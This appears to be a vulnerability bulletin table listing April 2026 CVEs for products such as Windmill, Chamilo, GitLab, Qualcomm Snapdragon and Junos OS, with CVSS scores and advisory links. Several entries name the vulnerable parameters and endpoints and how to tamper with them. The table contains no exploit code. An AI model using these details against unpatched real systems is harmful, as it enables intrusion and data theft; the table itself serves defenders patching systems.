| Windmill Labs--Windmill CE (Community Edition) | Windmill versions 1.56.0 through 1.614.0 contain a missing authorization vulnerability that allows users with the Operator role to perform prohibited entity creation and modification actions via the backend API. Although Operators are documented and priced as unable to create or modify entities, the API does not enforce the Operator restriction on workspace endpoints, allowing an Operator to create and update scripts, flows, apps, and raw_apps. Since Operators can also execute scripts via the jobs API, this allows direct privilege escalation to remote code execution within the Windmill deployment. This vulnerability has existed since the introduction of the Operator role in version 1.56.0. | 2026-04-07 | 8.8 | CVE-2026-22683 | https://chocapikk.com/posts/2026/windfall-nextcloud-flow-windmill-rce/ https://github.com/Chocapikk/Windfall https://github.com/windmill-labs/windmill/releases/tag/v1.615.0 https://github.com/windmill-labs/windmill/commit/c621a74804f4f6e8318819c01e3a23a17698588b https://www.windmill.dev/ https://apps.nextcloud.com/apps/flow/releases |
| chamilo--chamilo-lms | Chamilo LMS is a learning management system. Prior to 1.11.38, there is a path traversal in main/exercise/savescores.php leading to arbitrary file feletion. User input from $_REQUEST['test'] is concatenated directly into filesystem path without canonicalization or traversal checks. This vulnerability is fixed in 1.11.38. | 2026-04-10 | 8.3 | CVE-2026-31939 | https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-8q8c-v75x-q2hx https://github.com/chamilo/chamilo-lms/commit/4dddcc19d36119da27b7c49eb84a035800abae78 https://github.com/chamilo/chamilo-lms/releases/tag/v1.11.38 |
| danbilabs--Advanced Members for ACF | The Advanced Members for ACF plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the create_crop function in all versions up to, and including, 1.2.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). The vulnerability was partially patched in version 1.2.5. | 2026-04-08 | 8.8 | CVE-2026-3243 | https://www.wordfence.com/threat-intel/vulnerabilities/id/22b63369-c6ea-42e9-bea3-d15837da7732?source=cve https://plugins.trac.wordpress.org/browser/advanced-members/tags/1.2.4/core/modules/class-avatar.php#L57 https://plugins.trac.wordpress.org/browser/advanced-members/tags/1.2.4/core/modules/class-avatar.php#L266 https://plugins.trac.wordpress.org/browser/advanced-members/trunk/core/modules/class-avatar.php#L710 https://plugins.trac.wordpress.org/changeset/3479725/ https://plugins.trac.wordpress.org/changeset/3492372/ |
| Elastic--Logstash | Improper Limitation of a Pathname to a Restricted Directory (CWE-22) in Logstash can lead to arbitrary file write and potentially remote code execution via Relative Path Traversal (CAPEC-139). The archive extraction utilities used by Logstash do not properly validate file paths within compressed archives. An attacker who can serve a specially crafted archive to Logstash through a compromised or attacker-controlled update endpoint can write arbitrary files to the host filesystem with the privileges of the Logstash process. In certain configurations where automatic pipeline reloading is enabled, this can be escalated to remote code execution. | 2026-04-08 | 8.1 | CVE-2026-33466 | https://discuss.elastic.co/t/logstash-8-19-14-9-2-8-9-3-3-security-update-esa-2026-29/385816 |
| homarr-labs--homarr | Homarr is an open-source dashboard. Prior to 1.57.0, a DOM-based Cross-Site Scripting (XSS) vulnerability has been discovered in Homarr's /auth/login page. The application improperly trusts a URL parameter (callbackUrl), which is passed to redirect and router.push. An attacker can craft a malicious link that, when opened by an authenticated user, performs a client-side redirect and executes arbitrary JavaScript in the context of their browser. This could lead to credential theft, internal network pivoting, and unauthorized actions performed on behalf of the victim. This vulnerability is fixed in 1.57.0. | 2026-04-06 | 8.8 | CVE-2026-33510 | https://github.com/homarr-labs/homarr/security/advisories/GHSA-79pg-554g-rw82 |
| IBM--Langflow Desktop | IBM Langflow Desktop 1.6.0 through 1.8.2 Langflow could allow an authenticated user to execute arbitrary code on the system, caused by an insecure default setting which permits the deserialization of untrusted data in the FAISS component. | 2026-04-08 | 8.8 | CVE-2026-3357 | https://www.ibm.com/support/pages/node/7268428 |
| chamilo--chamilo-lms | Chamilo LMS is a learning management system. Prior to .0.0-RC.3, the PlatformConfigurationController::decodeSettingArray() method uses PHP's eval() to parse platform settings from the database. An attacker with admin access (obtainable via Advisory 1) can inject arbitrary PHP code into the settings, which is then executed when any user (including unauthenticated) requests /platform-config/list. This vulnerability is fixed in 2.0.0-RC.3. | 2026-04-10 | 8.8 | CVE-2026-33618 | https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-hp4w-jmwc-pg7w https://github.com/chamilo/chamilo-lms/commit/f2c382c94a3f153a4d7e5ce5686c5a219fd09b3b |
| lexiforest--curl_cffi | curl_cffi is the a Python binding for curl. Prior to 0.15.0, curl_cffi does not restrict requests to internal IP ranges, and follows redirects automatically via the underlying libcurl. Because of this, an attacker-controlled URL can redirect requests to internal services such as cloud metadata endpoints. In addition, curl_cffi's TLS impersonation feature can make these requests appear as legitimate browser traffic, which may bypass certain network controls. This vulnerability is fixed in 0.15.0. | 2026-04-06 | 8.6 | CVE-2026-33752 | https://github.com/lexiforest/curl_cffi/security/advisories/GHSA-qw2m-4pqf-rmpp |
| Juniper Networks--Junos OS | A Missing Authorization vulnerability in the CLI of Juniper Networks Junos OS on MX Series allows a local, authenticated user with low privileges to execute specific commands which will lead to a complete compromise of managed devices. Any user logged in, without requiring specific privileges, can issue 'request csds' CLI operational commands. These commands are only meant to be executed by high privileged or users designated for Juniper Device Manager (JDM) / Connected Security Distributed Services (CSDS) operations as they will impact all aspects of the devices managed via the respective MX. This issue affects Junos OS on MX Series: * 24.4 releases before 24.4R2-S3, * 25.2 releases before 25.2R2. This issue does not affect Junos OS releases before 24.4. | 2026-04-09 | 8.8 | CVE-2026-33785 | https://kb.juniper.net/JSA107872 |
| podman-desktop--podman-desktop | Podman Desktop is a graphical tool for developing on containers and Kubernetes. Prior to 1.26.2, an unauthenticated HTTP server exposed by Podman Desktop allows any network attacker to remotely trigger denial-of-service conditions and extract sensitive information. By abusing missing connection limits and timeouts, an attacker can exhaust file descriptors and kernel memory, leading to application crash or full host freeze. Additionally, verbose error responses disclose internal paths and system details (including usernames on Windows), aiding further exploitation. The issue requires no authentication or user interaction and is exploitable over the network. This vulnerability is fixed in 1.26.2. | 2026-04-07 | 8.2 | CVE-2026-34045 | https://github.com/podman-desktop/podman-desktop/security/advisories/GHSA-2q88-39rh-gxvv |
| OpenClaw--OpenClaw | OpenClaw before 2026.3.25 contains an improper access control vulnerability in the HTTP /sessions/:sessionKey/kill route that allows any bearer-authenticated user to invoke admin-level session termination functions without proper scope validation. Attackers can exploit this by sending authenticated requests to kill arbitrary subagent sessions via the killSubagentRunAdmin function, bypassing ownership and operator scope restrictions. | 2026-04-09 | 8.1 | CVE-2026-34512 | GitHub Security Advisory (GHSA-9p93-7j67-5pc2) Patch Commit VulnCheck Advisory: OpenClaw < 2026.3.25 - Improper Access Control in /sessions/:sessionKey/kill Endpoint |
| opnsense--core | OPNsense is a FreeBSD based firewall and routing platform. Prior to 26.1.6, OPNsense's LDAP authentication connector passes the login username directly into an LDAP search filter without calling ldap_escape(). An unauthenticated attacker can inject LDAP filter metacharacters into the username field of the WebGUI login page to enumerate valid LDAP usernames in the configured directory. When the LDAP server configuration includes an Extended Query to restrict login to members of a specific group, the same injection can be used to bypass that group membership restriction and authenticate as any LDAP user whose password is known, regardless of group membership. This vulnerability is fixed in 26.1.6. | 2026-04-09 | 8.2 | CVE-2026-34578 | https://github.com/opnsense/core/security/advisories/GHSA-jpm7-f59c-mp54 https://github.com/opnsense/core/commit/016f66cb4620cd48183fa97843f343bb71813c6e |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30356, 26.001.21367 and earlier are affected by an Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-04-11 | 8.6 | CVE-2026-34621 | https://helpx.adobe.com/security/products/acrobat/apsb26-43.html |
| MontFerret--ferret | Ferret is a declarative system for working with web data. Prior to 2.0.0-alpha.4, a path traversal vulnerability in Ferret's IO::FS::WRITE standard library function allows a malicious website to write arbitrary files to the filesystem of the machine running Ferret. When an operator scrapes a website that returns filenames containing ../ sequences, and uses those filenames to construct output paths (a standard scraping pattern), the attacker controls both the destination path and the file content. This can lead to remote code execution via cron jobs, SSH authorized_keys, shell profiles, or web shells. This vulnerability is fixed in 2.0.0-alpha.4. | 2026-04-06 | 8.1 | CVE-2026-34783 | https://github.com/MontFerret/ferret/security/advisories/GHSA-j6v5-g24h-vg4j https://github.com/MontFerret/ferret/commit/160ebad6bd50f153453e120f6d909f5b83322917 |
| David Lingren--Media LIbrary Assistant | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in David Lingren Media LIbrary Assistant allows SQL Injection.This issue affects Media LIbrary Assistant: from n/a through 3.34. | 2026-04-06 | 8.5 | CVE-2026-34885 | https://patchstack.com/database/wordpress/plugin/media-library-assistant/vulnerability/wordpress-media-library-assistant-plugin-3-34-sql-injection-vulnerability?_s_id=cve |
| adianti--Adianti Framework | Adianti Framework 5.5.0 and 5.6.0 contains an SQL injection vulnerability that allows authenticated users to manipulate database queries by injecting SQL code through the name field in SystemProfileForm. Attackers can submit crafted SQL statements in the profile edit endpoint to modify user credentials and gain administrative access. | 2026-04-12 | 7.1 | CVE-2018-25257 | ExploitDB-46217 VulnCheck Advisory: Adianti Framework 5.5.0 and 5.6.0 SQL Injection via Profile |
| Resourcespace--ResourceSpace | ResourceSpace 8.6 contains an SQL injection vulnerability that allows authenticated attackers to execute arbitrary SQL queries by injecting malicious code through the keywords parameter in collection_edit.php. Attackers can submit POST requests with crafted SQL payloads in the keywords field to extract sensitive database information including schema names, user credentials, and other confidential data. | 2026-04-12 | 7.1 | CVE-2019-25693 | ExploitDB-46274 Official Product Homepage Product Reference VulnCheck Advisory: ResourceSpace 8.6 SQL Injection via collection_edit.php |
| Newsbull--Newsbull Haber Script | Newsbull Haber Script 1.0.0 contains multiple SQL injection vulnerabilities in the search parameter that allow authenticated attackers to extract database information through time-based, blind, and boolean-based injection techniques. Attackers can inject malicious SQL code through the search parameter in endpoints like /admin/comment/records, /admin/category/records, /admin/news/records, and /admin/menu/childs to manipulate database queries and retrieve sensitive data. | 2026-04-12 | 7.1 | CVE-2019-25699 | ExploitDB-46266 Official Product Homepage Product Reference VulnCheck Advisory: Newsbull Haber Script 1.0.0 Authenticated SQL Injection via search parameter |
| Impresscms--ImpressCMS | ImpressCMS 1.3.11 contains a time-based blind SQL injection vulnerability that allows authenticated attackers to manipulate database queries by injecting SQL code through the 'bid' parameter. Attackers can send POST requests to the admin.php endpoint with malicious 'bid' values containing SQL commands to extract sensitive database information. | 2026-04-12 | 7.1 | CVE-2019-25703 | ExploitDB-46239 Official Product Homepage Product Reference VulnCheck Advisory: ImpressCMS 1.3.11 SQL Injection via bid Parameter |
| Across--DR-810 | Across DR-810 contains an unauthenticated file disclosure vulnerability that allows remote attackers to download the rom-0 backup file containing sensitive information by sending a simple GET request. Attackers can access the rom-0 endpoint without authentication to retrieve and decompress the backup file, exposing router passwords and other sensitive configuration data. | 2026-04-12 | 7.5 | CVE-2019-25706 | ExploitDB-46132 Official Product Homepage VulnCheck Advisory: Across DR-810 ROM-0 Unauthenticated File Disclosure |
| Ebrigade--eBrigade ERP | eBrigade ERP 4.5 contains an SQL injection vulnerability that allows authenticated attackers to execute arbitrary SQL queries by injecting malicious code through the 'id' parameter. Attackers can send GET requests to pdf.php with crafted SQL payloads in the 'id' parameter to extract sensitive database information including table names and schema details. | 2026-04-12 | 7.1 | CVE-2019-25707 | ExploitDB-46117 Official Product Homepage Product Reference VulnCheck Advisory: eBrigade ERP 4.5 SQL Injection via pdf.php |
| MyT--Project Management | MyT-PM 1.5.1 contains an SQL injection vulnerability that allows authenticated attackers to execute arbitrary SQL queries by injecting malicious code through the Charge[group_total] parameter. Attackers can submit crafted POST requests to the /charge/admin endpoint with error-based, time-based blind, or stacked query payloads to extract sensitive database information or manipulate data. | 2026-04-12 | 7.1 | CVE-2019-25713 | ExploitDB-46084 Official Product Homepage Product Reference VulnCheck Advisory: MyT-PM 1.5.1 SQL Injection via Charge[group_total] Parameter |
| Twitch--Twitch Studio | Twitch Studio version 0.114.8 and prior contain a privilege escalation vulnerability in its privileged helper tool that allows local attackers to execute arbitrary code as root by exploiting an unprotected XPC service. Attackers can invoke the installFromPath:toPath:withReply: method to overwrite system files and privileged binaries, achieving full system compromise. Twitch Studio was discontinued in May 2024. | 2026-04-06 | 7.8 | CVE-2024-14032 | https://www.iru.com/blog/twitch-privileged-helper https://help.twitch.tv/s/topic/0TO3a000000kZfYGAU/twitch-studio https://help.twitch.tv/s/article/recommended-software-for-broadcasting https://www.vulncheck.com/advisories/twitch-studio-launcherhelper-xpc-missing-authorization-to-root-file-write |
| WAGO--CC100 (0751-9x01) | An authenticated remote attacker with high privileges can exploit the OpenVPN configuration via the web-based management interface of a WAGO PLC. If user-defined scripts are permitted, OpenVPN may allow the execution of arbitrary shell commands enabling the attacker to run arbitrary commands on the device. | 2026-04-09 | 7.2 | CVE-2024-1490 | https://certvde.com/de/advisories/VDE-2024-008 https://wago.csaf-tp.certvde.com/.well-known/csaf/white/2026/vde-2024-008.json |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 13.0 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that could have allowed an unauthenticated user to cause denial of service by sending repeated GraphQL queries. | 2026-04-08 | 7.5 | CVE-2025-12664 | HackerOne Bug Bounty Report #3377091 https://gitlab.com/gitlab-org/gitlab/-/work_items/579376 https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/ |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in libssh. This vulnerability allows local man-in-the-middle attacks, security downgrades of SSH (Secure Shell) connections, and manipulation of trusted host information, posing a significant risk to the confidentiality, integrity, and availability of SSH communications via an insecure default configuration on Windows systems where the library automatically loads configuration files from the C:\etc directory, which can be created and modified by unprivileged local users. | 2026-04-07 | 7.8 | CVE-2025-14821 | https://access.redhat.com/security/cve/CVE-2025-14821 RHBZ#2423148 https://www.libssh.org/2026/02/10/libssh-0-12-0-and-0-11-4-security-releases/ |
| Qualcomm, Inc.--Snapdragon | Memory corruption when buffer copy operation fails due to integer overflow during attestation report generation. | 2026-04-06 | 7.8 | CVE-2025-47389 | https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption while preprocessing IOCTL request in JPEG driver. | 2026-04-06 | 7.8 | CVE-2025-47390 | https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption while processing a frame request from user. | 2026-04-06 | 7.8 | CVE-2025-47391 | https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Cryptographic issue while copying data to a destination buffer without validating its size. | 2026-04-06 | 7.1 | CVE-2025-47400 | https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html |
| Case Themes--Case Theme User | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Case Themes Case Theme User allows PHP Local File Inclusion.This issue affects Case Theme User: from n/a before 1.0.4. | 2026-04-10 | 7.5 | CVE-2025-5804 | https://patchstack.com/database/wordpress/plugin/case-theme-user/vulnerability/wordpress-case-theme-user-1-0-4-local-file-inclusion-vulnerability?_s_id=cve |
| Zootemplate--Cerato | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Zootemplate Cerato allows Reflected XSS.This issue affects Cerato: from n/a through 2.2.18. | 2026-04-10 | 7.1 | CVE-2025-58920 | https://patchstack.com/database/wordpress/theme/cerato/vulnerability/wordpress-cerato-theme-2-2-18-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 12.10 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that could have allowed an unauthenticated user to cause denial of service due to improper input validation of JSON payloads. | 2026-04-08 | 7.5 | CVE-2026-1092 | HackerOne Bug Bounty Report #3487030 https://gitlab.com/gitlab-org/gitlab/-/work_items/586479 https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/ |
| IBM--Verify Identity Access Container | IBM Verify Identity Access Container 11.0 through 11.0.2 and IBM Security Verify Access Container 10.0 through 10.0.9.1 and IBM Verify Identity Access 11.0 through 11.0.2 and IBM Security Verify Access 10.0 through 10.0.9.1 allows an attacker to contact internal authentication endpoints which are protected by the Reverse Proxy. | 2026-04-08 | 7.2 | CVE-2026-1343 | https://www.ibm.com/support/pages/node/7268253 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in gnutls. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted ClientHello message with an invalid Pre-Shared Key (PSK) binder value during the TLS handshake. This can lead to a NULL pointer dereference, causing the server to crash and resulting in a remote Denial of Service (DoS) condition. | 2026-04-09 | 7.5 | CVE-2026-1584 | https://access.redhat.com/security/cve/CVE-2026-1584 RHBZ#2435258 |
| Qualcomm, Inc.--Snapdragon | Transient DOS when processing nonstandard FILS Discovery Frames with out-of-range action sizes during initial scans. | 2026-04-06 | 7.6 | CVE-2026-21367 | https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory Corruption when retrieving output buffer with insufficient size validation. | 2026-04-06 | 7.8 | CVE-2026-21371 | https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory Corruption when sending IOCTL requests with invalid buffer sizes during memcpy operations. | 2026-04-06 | 7.8 | CVE-2026-21372 | https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory Corruption when accessing an output buffer without validating its size during IOCTL processing. | 2026-04-06 | 7.8 | CVE-2026-21373 | https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory Corruption when processing auxiliary sensor input/output control commands with insufficient buffer size validation. | 2026-04-06 | 7.8 | CVE-2026-21374 | https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory Corruption when accessing an output buffer without validating its size during IOCTL processing. | 2026-04-06 | 7.8 | CVE-2026-21375 | https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory Corruption when accessing an output buffer without validating its size during IOCTL processing in a camera sensor driver. | 2026-04-06 | 7.8 | CVE-2026-21376 | https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory Corruption when accessing an output buffer without validating its size during IOCTL processing in a camera sensor driver. | 2026-04-06 | 7.8 | CVE-2026-21378 | https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory Corruption when using deprecated DMABUF IOCTL calls to manage video memory. | 2026-04-06 | 7.8 | CVE-2026-21380 | https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Transient DOS when receiving a service data frame with excessive length during device matching over a neighborhood awareness network protocol connection. | 2026-04-06 | 7.6 | CVE-2026-21381 | https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory Corruption when handling power management requests with improperly sized input/output buffers. | 2026-04-06 | 7.8 | CVE-2026-21382 | https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html |
| Juniper Networks--Junos OS | A UNIX Symbolic Link (Symlink) Following vulnerability in the CLI of Juniper Networks Junos OS allows a local, authenticated attacker with low privileges to escalate their privileges to root which will lead to a complete compromise of the system. When after a user has performed a specific 'file link ...' CLI operation, another user commits (unrelated configuration changes), the first user can login as root. This issue affects Junos OS: * all versions before 23.2R2-S7, * 23.4 versions before 23.4R2-S6, * 24.2 versions before 24.2R2-S3, * 24.4 versions before 24.4R2-S2, * 25.2 versions before 25.2R2. This issue does not affect versions 25.4R1 or later. | 2026-04-09 | 7.3 | CVE-2026-21916 | https://kb.juniper.net/JSA107807 |
| Dolibarr--Dolibarr ERP/CRM | Dolibarr ERP/CRM versions prior to 23.0.2 contain an authenticated remote code execution vulnerability in the dol_eval_standard() function that fails to apply forbidden string checks in whitelist mode and does not detect PHP dynamic callable syntax. Attackers with administrator privileges can inject malicious payloads through computed extrafields or other evaluation paths using PHP dynamic callable syntax to bypass validation and achieve arbitrary command execution via eval(). | 2026-04-07 | 7.2 | CVE-2026-22666 | https://jivasecurity.com/writeups/dolibarr-remote-code-execution-cve-2026-22666 https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-vmvw-qq8w-wqhg https://github.com/Dolibarr/dolibarr/commit/6f425521b3e6f9f27eca05228e02093dbaa40dea https://github.com/Dolibarr/dolibarr/releases/tag/23.0.2 https://www.vulncheck.com/advisories/dolibarr-erp-crm-authenticated-rce-via-dol-eval-standard |
| HKUDS--OpenHarness | OpenHarness prior to commit 166fcfe contains an improper access control vulnerability in built-in file tools due to inconsistent parameter handling in permission enforcement, allowing attackers who can influence agent tool execution to read arbitrary local files outside the intended repository scope. Attackers can exploit the path parameter not being passed to the PermissionChecker in read_file, write_file, edit_file, and notebook_edit tools to bypass deny rules and access sensitive files such as configuration files, credentials, and SSH material, or create and overwrite files in restricted host paths in full_auto mode. | 2026-04-07 | 7.1 | CVE-2026-22682 | https://github.com/HKUDS/OpenHarness/pull/32 https://github.com/HKUDS/OpenHarness/commit/166fcfefb7614dbac51bd061f56542725b0298e9 https://www.vulncheck.com/advisories/openharness-improper-access-control-via-file-tools |
| VMware--Spring Cloud Gateway | When configuring SSL bundles in Spring Cloud Gateway by using the configuration property spring.ssl.bundle, the configuration was silently ignored and the default SSL configuration was used instead. Note: The 4.2.x branch is no longer under open source support. If you are using Spring Cloud Gateway 4.2.0 and are not an enterprise customer, you can upgrade to any Spring Cloud Gateway 4.2.x release newer than 4.2.0 available on Maven Centeral https://repo1.maven.org/maven2/org/springframework/cloud/spring-cloud-gateway/ . Ideally if you are not an enterprise customer, you should be upgrading to 5.0.2 or 5.1.1 which are the current supported open source releases. | 2026-04-10 | 7.5 | CVE-2026-22750 | https://spring.io/security/cve-2026-22750 |
| Dell--Elastic Cloud Storage | Dell Elastic Cloud Storage, version 3.8.1.7 and prior, and Dell ObjectScale, versions prior to 4.1.0.3 and version 4.2.0.0, contains an Insertion of Sensitive Information into Log File vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to secret exposure. The attacker may be able to use the exposed secret to access the vulnerable system with privileges of the compromised account. | 2026-04-08 | 7.8 | CVE-2026-28261 | https://www.dell.com/support/kbdoc/en-us/000449325/dsa-2026-143-security-update-for-dell-objectscale-prior-to-4-1-0-3-and-4-2-0-0-insertion-of-sensitive-information-into-log-file-vulnerability |
| CouchCMS--CouchCMS | CouchCMS contains a privilege escalation vulnerability that allows authenticated Admin-level users to create SuperAdmin accounts by tampering with the f_k_levels_list parameter in user creation requests. Attackers can modify the parameter value from 4 to 10 in the HTTP request body to bypass authorization validation and gain full application control, circumventing restrictions on SuperAdmin account creation and privilege assignment. | 2026-04-10 | 7.2 | CVE-2026-29002 | https://gist.github.com/thepiyushkumarshukla/477e2d2bbbe8cc3ec0d640c50f0cf9e1 https://www.couchcms.com/ https://www.vulncheck.com/advisories/couchcms-privilege-escalation-via-f-k-levels-list-parameter |
| glpi-project--glpi | GLPI is a free asset and IT management software package. From 10.0.0 to before 10.0.24 and 11.0.6, an authenticated user can perform a SQL injection via the logs export feature. This vulnerability is fixed in 10.0.24 and 11.0.6. | 2026-04-06 | 7.2 | CVE-2026-29047 | https://github.com/glpi-project/glpi/security/advisories/GHSA-3m49-qf92-vccr |
| open-telemetry--opentelemetry-go | OpenTelemetry-Go is the Go implementation of OpenTelemetry. From 1.36.0 to 1.40.0, multi-value baggage: header extraction parses each header field-value independently and aggregates members across values. This allows an attacker to amplify cpu and allocations by sending many baggage: header lines, even when each individual value is within the 8192-byte per-value parse limit. This vulnerability is fixed in 1.41.0. | 2026-04-07 | 7.5 | CVE-2026-29181 | https://github.com/open-telemetry/opentelemetry-go/security/advisories/GHSA-mh2q-q3fh-2475 |
| Tinyproxy Project--Tinyproxy | Tinyproxy through 1.11.3 is vulnerable to HTTP request parsing desynchronization due to a case-sensitive comparison of the Transfer-Encoding header in src/reqs.c. The is_chunked_transfer() function uses strcmp() to compare the header value against "chunked", even though RFC 7230 specifies that transfer-coding names are case-insensitive. By sending a request with Transfer-Encoding: Chunked, an unauthenticated remote attacker can cause Tinyproxy to misinterpret the request as having no body. In this state, Tinyproxy sets content_length.client to -1, skips pull_client_data_chunked(), forwards request headers upstream, and transitions into relay_connection() raw TCP forwarding while unread body data remains buffered. This leads to inconsistent request state between Tinyproxy and backend servers. RFC-compliant backends (e.g., Node.js, Nginx) will continue waiting for chunked body data, causing connections to hang indefinitely. This behavior enables application-level denial of service through backend worker exhaustion. Additionally, in deployments where Tinyproxy is used for request-body inspection, filtering, or security enforcement, the unread body may be forwarded without proper inspection, resulting in potential security control bypass. | 2026-04-07 | 7.5 | CVE-2026-31842 | Upstream issue report and reproduction details Tinyproxy upstream project RFC 7230: transfer-coding names are case-insensitive |
| chamilo--chamilo-lms | Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, in main/lp/aicc_hacp.php, user-controlled request parameters are directly used to set the PHP session ID before loading global bootstrap. This leads to session fixation. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3. | 2026-04-10 | 7.5 | CVE-2026-31940 | https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-4gp7-cfjh-77gv https://github.com/chamilo/chamilo-lms/commit/ce0192c62e48c9d9474d915c541b3274844afbf9 https://github.com/chamilo/chamilo-lms/commit/e337b7cc74a0276a0b4f91f9282204d20cac1869 |
| chamilo--chamilo-lms | Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, Chamilo LMS contains a Server-Side Request Forgery (SSRF) vulnerability in the Social Wall feature. The endpoint read_url_with_open_graph accepts a URL from the user via the social_wall_new_msg_main POST parameter and performs two server-side HTTP requests to that URL without validating whether the target is an internal or external resource. This allows an authenticated attacker to force the server to make arbitrary HTTP requests to internal services, scan internal ports, and access cloud instance metadata. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3. | 2026-04-10 | 7.7 | CVE-2026-31941 | https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-q74c-mx8x-489h https://github.com/chamilo/chamilo-lms/commit/e3790c5f0ff3b4dc547c2099fadf5c438c1bb265 https://github.com/chamilo/chamilo-lms/commit/ea6b7b7e90580c9b01dc4bcafe4ad737061e0ead |
| chartbrew--chartbrew | Chartbrew is an open-source web application that can connect directly to databases and APIs and use the data to create charts. Prior to 4.9.0, a cross-tenant authorization bypass exists in Chartbrew in GET /team/:team_id/template/generate/:project_id. The GET handler calls checkAccess(req, "updateAny", "chart") without awaiting the returned promise, and it does not verify that the supplied project_id belongs to req.params.team_id or to the caller's team. As a result, an authenticated attacker with valid template-generation permissions in their own team can request the template model for a project belonging to another team and receive victim project data. This vulnerability is fixed in 4.9.0. | 2026-04-10 | 7.7 | CVE-2026-32252 | https://github.com/chartbrew/chartbrew/security/advisories/GHSA-mw4f-cf22-qpcj https://github.com/chartbrew/chartbrew/commit/bf5919043d3587fcbe76123aaabd9a0a9d1033f1 |
| Red Hat--mirror registry for Red Hat OpenShift | A flaw was found in Red Hat Quay's container image upload process. An authenticated user with push access to any repository on the registry can interfere with image uploads in progress by other users, including those in repositories they do not have access to. This could allow the attacker to read, modify, or cancel another user's in-progress image upload. | 2026-04-08 | 7.1 | CVE-2026-32589 | https://access.redhat.com/security/cve/CVE-2026-32589 RHBZ#2446963 |
| Red Hat--mirror registry for Red Hat OpenShift | A flaw was found in Red Hat Quay's handling of resumable container image layer uploads. The upload process stores intermediate data in the database using a format that, if tampered with, could allow an attacker to execute arbitrary code on the Quay server. | 2026-04-08 | 7.1 | CVE-2026-32590 | https://access.redhat.com/security/cve/CVE-2026-32590 RHBZ#2446964 |
| NI--LabVIEW | There is a memory corruption vulnerability due to an out-of-bounds write when loading a corrupted LVLIB file in NI LabVIEW. This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted .lvlib file. This vulnerability affects NI LabVIEW 2026 Q1 (26.1.0) and prior versions. | 2026-04-07 | 7.8 | CVE-2026-32860 | https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/2026/lv-project-library-file-parsing-memory-corruption-vulnerability-in-ni-labview.html |
| NI--LabVIEW | There is a memory corruption vulnerability due to an out-of-bounds write when loading a corrupted LVCLASS file in NI LabVIEW. This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted .lvclass file. This vulnerability affects NI LabVIEW 2026 Q1 (26.1.0) and prior versions. | 2026-04-07 | 7.8 | CVE-2026-32861 | https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/2026/lv-class-file-parsing-memory-corruption-vulnerability-in-ni-labview.html |
